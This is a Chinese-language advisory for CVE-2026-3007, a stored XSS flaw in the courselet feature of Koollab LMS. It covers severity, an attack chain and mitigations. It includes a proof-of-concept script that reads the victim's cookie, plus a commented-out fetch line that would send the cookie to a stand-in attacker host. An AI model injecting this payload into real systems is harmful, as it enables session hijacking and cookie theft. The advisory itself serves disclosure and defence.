CVE-2026-3007 CVSS 5.4 中危

CVE-2026-3007 Koollab LMS 存储型XSS漏洞

披露日期: 2026-04-23

来源: 5f57b9bf-260d-4433-bf07-b6a79e9bb7d4

漏洞信息

漏洞编号

CVE-2026-3007

漏洞类型

存储型跨站脚本 (Stored XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Koollab LMS

漏洞概述

CVE-2026-3007是Koollab LMS中的一个存储型跨站脚本漏洞。由于系统未能有效过滤用户输入，攻击者可植入恶意脚本。当具有权限的用户访问相关courselet功能时，脚本将被执行，导致账户被劫持或敏感数据泄露。

技术细节

该漏洞属于存储型跨站脚本漏洞，其核心在于Koollab LMS的courselet功能模块对用户提交的数据缺乏严格的上下文感知编码。攻击者首先需获取一个低权限账户，随后在courselet的数据提交点（如课程描述、评论等）注入恶意JavaScript代码。由于服务器端未对特殊字符（如<, >, ', "）进行HTML实体编码，恶意代码被持久化存储在数据库中。当其他用户（特别是高权限用户）访问受感染的courselet页面时，服务器会将未转义的恶意代码作为HTML文档的一部分返回。受害者的浏览器解析并执行该脚本，根据CVSS 3.1向量（S:C），攻击可突破当前页面范围，进而窃取Session Cookie、进行钓鱼操作或篡改页面内容。

攻击链分析

STEP 1

侦察

攻击者识别目标Koollab LMS系统，确认存在courselet功能。

STEP 2

注入

攻击者使用低权限账户利用courselet的输入接口提交包含恶意JavaScript的Payload。

STEP 3

存储

服务器端未过滤恶意代码，将其持久化存储在数据库中。

STEP 4

触发

受害者（如管理员）访问包含恶意内容的courselet页面。

STEP 5

执行

受害者浏览器执行恶意脚本，导致会话劫持或数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for Stored XSS in Koollab LMS courselet feature -->
<!-- Inject this payload into a vulnerable input field -->
<script>
  // Simulate stealing the victim's cookie
  var stolenCookie = document.cookie;
  console.log('Stolen Cookie: ' + stolenCookie);
  
  // Send data to attacker controlled server (hypothetical)
  // fetch('https://attacker.example.com/log?c=' + encodeURIComponent(stolenCookie));
  
  alert('XSS Executed');
</script>

影响范围

Koollab LMS (具体版本请参考官方通告)

防御指南

临时缓解措施

在官方补丁发布前，建议管理员限制courselet功能的用户权限，或暂时禁用该功能。同时，建议对所有用户输入进行临时过滤，并教育用户不要在系统内点击不明链接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表